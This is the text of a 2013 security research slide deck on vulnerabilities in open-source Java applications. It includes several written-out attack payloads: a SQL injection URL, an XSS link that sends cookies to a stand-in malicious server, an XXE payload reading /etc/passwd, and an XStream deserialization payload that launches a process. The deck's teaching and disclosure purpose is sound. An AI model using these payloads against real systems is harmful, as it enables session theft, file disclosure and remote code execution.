Critical vulnerability patterns in open-source Java

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained
herein is subject to change without notice. Critical vulnerability patterns in open-source Java Alvaro Muñoz, Software Security Researcher

herein is subject to change without notice. 2 Whois Alvaro Muñoz Employer Hewlett-Packard Organization HP Software Security Research Responsibilities Research the security impact of new technologies. Specially interested on Web stuﬀ, any language, any framework. In previous episodes Application Security Consultant Pentester Other Stuﬀ CTF player, OSCP, GWAPT, CISSP … Location Madrid, Spain @pwntester

herein is subject to change without notice. 3 Critical vulnerability patterns in open-source Java Agenda 1.  Why should I care in the ﬁrst place? 2.  OSS Security Posture 3.  Critical issues in OSS applications 4.  Critical issues in OSS components 5.  Disclosure in the open source world 6.  Five steps to open source peace of mind

herein is subject to change without notice. Why should I care in the ﬁrst place?

herein is subject to change without notice. 5 Some metrics “By 2015 ninety-nine percent of mission critical applications in Global 2000 companies will contain open source.” “80% of the code in today’s applications comes from libraries and frameworks” “More than half of Global 500 companies are using open source applications with known vulnerabilities” “26% of library downloads have known vulnerabilities” Gartner & SonaType & Aspect Security Source: https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf

herein is subject to change without notice. 6 Using Components with Known Vulnerabilities New OWASP Top10 2013 – A9 Source: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/OWASP-Top-Ten-2013/ba-p/6046369

herein is subject to change without notice. OSS Security Posture

herein is subject to change without notice. 8 The research Goal: •  Figure out the security posture of Open Source Software Procedure: •  Analyze 10 popular Java open source applications with Fortify SCA •  Use the same Fortify SCA version and rulepacks for all tests •  Scan the latest released snapshot as well as a three years old version •  Focus on the critical issues only •  Manually review a popular open source library

herein is subject to change without notice. 9 The applications •  Messaging and Integration Patterns server Apache ActiveMQ •  Portlet container Liferay Portal •  Implementation of the Java Servlet and JSP technologies Apache Tomcat •  Application server that implements the Java EE JBoss •  Continuous integration Server Cruise Control •  Full-featured, multi-user and group-blog server Apache Roller •  Enterprise resource planning (ERP) system Ofbiz •  Website content management system OpenCMS •  A light weight, open source, blogger Pebble •  Microﬁnance institution management system Mifos

herein is subject to change without notice. 10 Persistent XSS Reﬂected XSS Insecure Password submission SQL injection Path Manipulation Privacy Violation XML External Entity Inj Command Injection ActiveMQ ✔ ✔ ✔ ✔ ✔ Apache Roller ✔ ✔ Apache Tomcat ✔ ✔ ✔ ✔ Cruise Control ✔ ✔ ✔ JBoss ✔ ✔ Liferay Portal ✔ ✔ ✔ ✔ OfBiz ✔ ✔ ✔ ✔ OpenCMS ✔ ✔ ✔ Pebble ✔ ✔ Mifos ✔ ✔ SCA Findings

herein is subject to change without notice. 11 # Critical ﬁndings 0 20 40 60 80 100 120 3 years Current

herein is subject to change without notice. 12 # Critical ﬁndings Density 0 1 2 3 4 5 6 7 3 years Current

herein is subject to change without notice. Critical issues in OSS Applications

herein is subject to change without notice. 14 Example 1: SQL Injection 1.  String uid = request.getParameter(“id”); 2.  String query = “select name from Users where id = “ + uid; 3.  dbconn.executeQuery(query); http://<host>/page.jsp?id=1 SELECT name FROM Users WHERE id = 1

herein is subject to change without notice. 15 Example 1: SQL Injection 1.  String uid = request.getParameter(“id”); 2.  String query = “select name from Users where id = “ + uid; 3.  dbconn.executeQuery(query); http://<host>/page.jsp?id=1 union select ccid from Cards SELECT name FROM Users WHERE id = 1 UNION SELECT ccid FROM Cards

herein is subject to change without notice. 16 Dataﬂow diagram Example 1 : SQL injection

herein is subject to change without notice. 17 1.  @GET 2.  @Consumes({ MediaType.APPLICATION_JSON }) 3.  @Produces({ MediaType.APPLICATION_JSON }) 4.  public String retrieveStaff(UriInfo uriInfo,@QueryParam("sqlSearch") String sqlSearch, @QueryParam("officeId") Long officeId) { 5.  context.authenticatedUser().validateHasReadPermission(resourceNameForPermissions); 6.  final Collection<StaffData> staff = this.readPlatformService.retrieveAllStaff(sqlSearch, officeId); 7.  final ApiRequestJsonSerializationSettings settings = apiRequestParameterHelper.process(uriInfo.getQueryParameters()); 8.  return this.toApiJsonSerializer.serialize(settings, staff, RESPONSE_DATA_PARAMETERS); 9.  }

herein is subject to change without notice. 18 1.  @GET 2.  @Consumes({ MediaType.APPLICATION_JSON }) 3.  @Produces({ MediaType.APPLICATION_JSON }) 4.  public String retrieveStaff(UriInfo uriInfo,@QueryParam("sqlSearch") String sqlSearch, @QueryParam("officeId") Long officeId) { 5.  context.authenticatedUser().validateHasReadPermission(resourceNameForPermissions); 6.  final Collection<StaffData> staff = this.readPlatformService.retrieveAllStaff(sqlSearch, officeId); 7.  final ApiRequestJsonSerializationSettings settings = apiRequestParameterHelper.process(uriInfo.getQueryParameters()); 8.  return this.toApiJsonSerializer.serialize(settings, staff, RESPONSE_DATA_PARAMETERS); 9.  }

herein is subject to change without notice. 19 1.  @Override 2.  public Collection<StaffData> retrieveAllStaff(final String sqlSearch, final Long officeId) { 3.  final String extraCriteria = getStaffCriteria(sqlSearch, officeId); 4.  return retrieveAllStaff(extraCriteria); 5.  }

herein is subject to change without notice. 21 1.  private String getStaffCriteria(final String sqlSearch, final Long officeId) { 2.  String extraCriteria = "”; 3.  if (sqlSearch != null) { 4.  extraCriteria = " and (" + sqlSearch + ")"; 5.  } 6.  if (officeId != null) { 7.  extraCriteria += " and office_id = " + officeId; 8.  } 9.  if (StringUtils.isNotBlank(extraCriteria)) { 10.  extraCriteria = extraCriteria.substring(4); 11.  } 12.  return extraCriteria; 13.  }

herein is subject to change without notice. 26 1.  private Collection<StaffData> retrieveAllStaff(final String extraCriteria) { 2.  final StaffMapper rm = new StaffMapper(); 3.  String sql = "select " + rm.schema(); 4.  if (StringUtils.isNotBlank(extraCriteria)) { 5.  sql += " where " + extraCriteria; 6.  } 7.  sql = sql + " order by s.lastname"; 8.  return this.jdbcTemplate.query(sql, rm, new Object[] {}); 9.  }

herein is subject to change without notice. 30 Example 2: Cross-Site Scripting

herein is subject to change without notice. 31 Example 2: Cross Site Scripting http://<host>/page.jsp?user=John <html> <body> <h1>Hi John!</h1> </body> </html> Hi John!

herein is subject to change without notice. 32 Hi! Example 2: Cross Site Scripting http://host/page.jsp?user=<script>alert(“xss”)</script> <html> <body> <h1>Hi <script>alert(“xss”)</script>!</h1> </body> </html> xss

herein is subject to change without notice. 33 Will you click on this link?? www.mybank.com/transfers?user=<script>window.open(“http:// maliciousserver.com/cookiestealer.php?” + document.cookie());</script>

herein is subject to change without notice. 34 What about this one? http://bit.ly/XSpPhP

herein is subject to change without notice. 35 Hi<script>alert(“xss”)</script>! Example 2: Cross Site Scripting http://host/page.jsp?user=<script>alert(“xss”)</script> <html> <body> <h1>Hi <script>alert(“xss”)</script>! </h1> </body> </html>

herein is subject to change without notice. 36 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("<input type=\"hidden\" name=\""); 10.  result.append(param); 11.  result.append("\" value=\""); 12.  result.append(Encoder.escapeXml((String)entry.getValue())); 13.  result.append("\">\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }

herein is subject to change without notice. 37 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("<input type=\"hidden\" name=\""); 10.  result.append(param); 11.  result.append("\" value=\""); 12.  result.append(Encoder.escapeXml((String)entry.getValue())); 13.  result.append("\">\n"); 14.  } 15.  } 16.  return result.toString(); 17.  } Safe output encoding

herein is subject to change without notice. 42 Example 3: Path Manipulation

herein is subject to change without notice. 43 1.  public View process(HttpServletRequest request, HttpServletResponse response) throws ServletException { 2.  Blog blog = (Blog)getModel().get(Constants.BLOG_KEY); 3.  String name = request.getParameter("name"); 4.  String type = request.getParameter("type"); 5.  String path = request.getParameter("path"); 6.  String content = request.getParameter("fileContent"); 7.  try { 8.  FileManager fileManager = new FileManager(blog, type); 9.  fileManager.saveFile(path, name, content); 10.  if (type.equals(FileMetaData.THEME_FILE)) { 11.  fileManager = new FileManager(blog, FileMetaData.BLOG_DATA); 12.  fileManager.saveFile("/theme" + path, name, content); 13.  } 14.  blog.info("File \"" + StringUtils.transformHTML(name) + "\" saved."); 15.  } catch (IllegalFileAccessException e) { 16.  return new ForbiddenView(); 17.  } catch (IOException ioe) { 18.  throw new ServletException(ioe); 19.  } 20.  return new ForwardView("/editFile.secureaction"); 21.  }

herein is subject to change without notice. 44 1.  public void saveFile(String path, String name, String content) throws IOException, IllegalFileAccessException { 2.  FileMetaData subDirectory = getFileMetaData(path); 3.  File fileToSave = new File(getFile(subDirectory), name); 4.  if (!isUnderneathRootDirectory(fileToSave)) { 5.  throw new IllegalFileAccessException(); 6.  } 7.  BufferedWriter writer = null; 8.  try { 9.  writer = new BufferedWriter(new FileWriter(fileToSave)); 10.  writer.write(content); 11.  writer.flush(); 12.  } finally { 13.  IOUtils.closeQuietly(writer); 14.  } 15.  }

herein is subject to change without notice. Critical issues in OSS Components

herein is subject to change without notice. 46 A closer look at Spring In their own words:

herein is subject to change without notice. 47 Security issues reported: Timeline Date CVE # Description 09 October 2012 CVE-2012-5055 Spring Security's DaoAuthenticationProvider can reveal if a username is valid 29 March 2012 CVE-2012-1833 Grails data binding vulnerability 9 September 2011 CVE-2011-2894 Spring Framework and Spring Security serialization-based remoting vulnerabilities 9 September 2011 CVE-2011-2732 Spring Security header injection vulnerability 9 September 2011 CVE-2011-2731 Spring Security Privilege escalation when using RunAsManager 9 September 2011 CVE-2011-2730 Spring Framework Information Disclosure and remote code execution 10 August 2011 CVE-2011-0527 vFabric tc Server password obfuscation bypass 24 May 2011 CVE-2011-1942 Spring Web Services: Information Disclosure 5 February 2011 CVE-2009-2899 Hyperic HQ: Information disclosure 27 October 2010 CVE-2010-3700 Spring Security: Bypass of security constraints 17 June 2010 CVE-2010-1622 Spring Framework: Execution of arbitrary code 13 May 2010 CVE-2010-1454 tc Server Runtime: Unauthenticated access to remote JMX interface 23 March 2010 CVE-2009-2907 Hyperic HQ: Multiple XSS 2 October 2009 CVE-2009-2898 Hyperic HQ: Stored XSS 2 October 2009 CVE-2009-2897 Hyperic HQ: Reﬂected XSS 22 April 2009 CVE-2009-1190 Spring Framework: Remote denial of service

herein is subject to change without notice. 48 RESTFul APIs •  RESTFul APIs are becoming more popular •  They can be found everywhere, especially for powering up mobile applications •  The most popular frameworks for Java are JAX-RS and SpringMVC •  SpringMVC uses SpringOXM to un-marshall the incoming XML messages into Java Objects <contact> <name>John</name> <lastname>Smith</lastname> <description>Friend</description> </contact> public void createContact(Contact c) { save(c); log(c.getDescription()); }

herein is subject to change without notice. 49 XML Entities XML External Entity Injection (XXE) <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE contracts [<!ENTITY terms “<Terms and Conditions>”>]> <contracts> <contract> <header>…</header> <body>…</body> <terms>&terms;</terms> </contract> … </contracts>

herein is subject to change without notice. 50 XML Entities XML External Entity Injection (XXE) <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE contracts [<!ENTITY terms SYSTEM “http://server/terms”>]> <contracts> <contract> <header>…</header> <body>…</body> <terms>&terms;</terms> </contract> … </contracts>

herein is subject to change without notice. 51 Anatomy of an XXE Attack public void createContact(Contact c) { save(c); } public Contact getContact(Long id) { Contact c = getContact(id); return c; } RESTFul WebService

herein is subject to change without notice. 52 Anatomy of an XXE Attack <contact> <name>John</name> <lastname>Smith</lastname> <description>Friend</description> </contact> public void createContact(Contact c) { save(c); } RESTFul WebService public Contact getContact(Long id) { Contact c = getContact(id); return c; }

herein is subject to change without notice. 53 Anatomy of an XXE Attack public void createContact(Contact c) { save(c); } Name: John! Last name: Smith! Description:! Friend! RESTFul WebService public Contact getContact(Long id) { Contact c = getContact(id); return c; } <contact> <name>John</name> <lastname>Smith</lastname> <description>Friend</description> </contact>

herein is subject to change without notice. 54 Anatomy of an XXE Attack <contact> <name>John</name> <lastname>Smith</lastname> <description>&xxe;</description> </contact> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE contact[ <!ENTITY xxe SYSTEM "ﬁle://etc/passwd">]> public Contact getContact(Long id) { Contact c = getContact(id); return c; } public void createContact(Contact c) { save(c); }

herein is subject to change without notice. 55 <contact> <name>John</name> <lastname>Smith</lastname> <description>&xxe;</description> </contact> Anatomy of an XXE Attack Name: John! Last name: Smith! Description:! root:*:0:0:System:/var/root:/bin/sh! user1:*:0:0:System:/var/root:/bin/sh! user2:*:0:0:System:/var/root:/bin/sh! user3:*:0:0:System:/var/root:/bin/sh! ! public void createContact(Contact c) { save(c); } public Contact getContact(Long id) { Contact c = getContact(id); return c; } <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE contact[ <!ENTITY xxe SYSTEM "ﬁle://etc/passwd">]>

herein is subject to change without notice. 56 SpringOXM unmarshallers SpringOXM is a wrapper around a a variety of unmarshalers including: •  JAXB •  Castor •  XStream Our research concludes that: •  Xstream Wrapper is not vulnerable since it does not process DOCTYPE blocks •  Castor Wrapper is insecure but there is an undocumented way to secure it •  JAXB Wrapper is insecure and there is no way to secure it Unfortunately JAXB is by far the most popular

herein is subject to change without notice. 57

herein is subject to change without notice. 58 •  XStream is not exactly a marshaller as it allows full object serialization •  http://xstream.codehaus.org/converters.html contains a complete list of objects that can be serialized •  One interesting class: DynamicProxyConverter Remote Code Execution in XStream unmarshaller

herein is subject to change without notice. 59 What is a DynamicProxy again? A way to intercept method calls on an interface and inject custom code Class ﬁled1 ﬁeld2 method1 method2 method3

herein is subject to change without notice. 60 What is a DynamicProxy again? A way to intercept method calls on an interface and inject custom code Interface method1 method2 Implementation ﬁled1 ﬁeld2 method1 method2 method3

herein is subject to change without notice. 61 What is a DynamicProxy again? A way to intercept method calls on an interface and inject custom code Interface method1 method2 Object ﬁled1 ﬁeld2 method1 method2 method3 Proxy method2 Custom code

herein is subject to change without notice. 62 Turning a Feature into a Bug Attacker’s plan: •  Find out what Class the XML will be deserialized to •  Create a proxy for that Class the WebService is waiting for •  Intercept/hook any call to any method in the interface •  Replace the original call with the malicious payload •  Send the serialized version of the proxy •  Cross-ﬁngers •  Proﬁt

herein is subject to change without notice. 64 Exploit <contact> <id>1</id> <ﬁrstName>alvaro</ﬁrstName> <lastName>munoz</lastName> <email>[email protected]</email> </contact>

herein is subject to change without notice. 65 Exploit <dynamic-proxy> <interface>org.company.model.Contact</interface> <handler class="java.beans.EventHandler"> <target class="java.lang.ProcessBuilder"> <command><string>calc.exe</string></command> </target> <action>start</action> </handler> </dynamic-proxy> <contact> <id>1</id> <ﬁrstName>alvaro</ﬁrstName> <lastName>munoz</lastName> <email>[email protected]</email> </contact>

herein is subject to change without notice. 66 Meanwhile in the application code … 1.  @Controller 2.  @RequestMapping("/contacts") 3.  public class ContactController { 4.  @Autowired 5.  private ContactRepository contactRepository; 6.  @RequestMapping( method = RequestMethod.POST ) 7.  @ResponseStatus( HttpStatus.CREATED ) 8.  public final String create( @RequestBody Contact contact ){ 9.  log(”Creating new contact: " + contact.getFirstName()); 10.  contactRepository.save(contact); 11.  return "OK"; 12.  } 13.  }

herein is subject to change without notice. 67 1.  @Controller 2.  @RequestMapping("/contacts") 3.  public class ContactController { 4.  @Autowired 5.  private ContactRepository contactRepository; 6.  @RequestMapping( method = RequestMethod.POST ) 7.  @ResponseStatus( HttpStatus.CREATED ) 8.  public final String create( @RequestBody Contact contact ){ 9.  log(”Creating new contact: " + contact.getFirstName()); 10.  contactRepository.save(contact); 11.  return "OK"; 12.  } 13.  } Meanwhile in the application code …

herein is subject to change without notice. Disclosure in the Open Source World

herein is subject to change without notice. 70 Responsible Disclosure •  Open Source projects have been notiﬁed about the issues found during this research •  Reactions cover the whole spectrum: from immediate response to no response at all Special thanks to the developers and maintainers of the SpringSource project for their prompt responses

herein is subject to change without notice. 71 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository

herein is subject to change without notice. 75 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository The conversation goes on … Conclusion, 9 months after the issue is still open!

herein is subject to change without notice. 77 OSS developers Vs. Security Researchers Gap Developers vs. security auditors is an ongoing battle •  OSS is not an exception •  In mature OSS projects there is a Security team to smooth it down Security researchers cannot just break in and try to change how things are done •  Developers need remediation guidance Security issues are normally reported in a non actionable way •  Developers need to understand issues if you want them to change their code Avoid using security buzzy talk e.g.: Cross-site scripting vs Lack of output encoding

herein is subject to change without notice. 78 Rewarding Researchers for Responsibly Disclosing Vulnerabilities Zero Day Initiative (ZDI) World’s Leading Vulnerability Bounty Program •  Network of Almost 3,000 Researchers Worldwide •  $8 Million Paid to Researchers •  Disclosed Over 1300 Vulnerabilities Patching of Critical Defects in Software •  36% of Oracle Java’s Critical Vulnerabilities with CVSS > 9.0 •  ~50% of Microsoft Critical Vulnerabilities in 2013 Proven Thought Leadership •  Pwn2Own Hacking Competition Series •  Frost & Sullivan Market Share Leader 2012 •  Leader in Critical Vulnerability Disclosures in 2013

herein is subject to change without notice. Five steps to open source peace of mind

herein is subject to change without notice. 80 Step 1: Identify your open source usage 1.1 Identify Open Source Software used throughout your company and versions –  Libraries –  Frameworks –  Middleware –  Applications 100% open source (CMS, Blogs, Application servers …) 1.2 Create and validate against a release policy –  Automate this process when possible 1.3 Use data collected to build proﬁles on each project –  Open source code’s origin –  Where to get updates (including security alerts) –  How often the community releases new versions

herein is subject to change without notice. 81 Step 2: Assess OSS for vulnerabilities / ﬁx issues 2.1 Evaluate the open source code used in your enterprise for vulnerabilities –  Community bug tracking system and mailing lists –  BugTraq (www.securityfocus.com) –  MITRE’s Common Vulnerability and Exposures (CVE) (cve.mitre.org) –  Open Sourced Vulnerability Database (http://www.osvdb.org) –  National Vulnerability Database (http://nvd.nist.gov) 2.2 Security Testing –  Automated Static, Dynamic, and Runtime Analysis for OSS Components –  Manual Code Review 2.3 Fixing vulnerabilities –  Ask the open source community to ﬁx them –  Fix them yourself

herein is subject to change without notice. 82 Step 3: Develop open source usage policies 3.1 Establish a policy on acceptable open source usage within your enterprise –  Using your inventory and risk assessments, generate a list of approved OSS –  OSS should be maintained in an internal repository –  Create the processes to update and maintain the repository 3.2 Communication –  Project managers –  Developers –  Testers –  Architects –  Application owners

herein is subject to change without notice. 83 Step 4: Develop a patch management process 4.1 Don’t forget to include OSS in your patch management process –  When new vulnerabilities are identiﬁed: •  Explore possible mitigation strategies to implement until patch is available •  Once released, inform your development teams •  Make sure there is a patch plan in place

herein is subject to change without notice. 84 Step 5: Create a compliance gate 5.1 Compliance validation for the OSS usage policy –  Add a compliance check to any existing security or veriﬁcation steps in your SDLC –  Periodic compliance checks

herein is subject to change without notice. Thank you!

herein is subject to change without notice. Security for the new reality

Critical vulnerability patterns in open-source ...

Critical vulnerability patterns in open-source Java

More Decks by Alvaro

Other Decks in Research

Featured

Transcript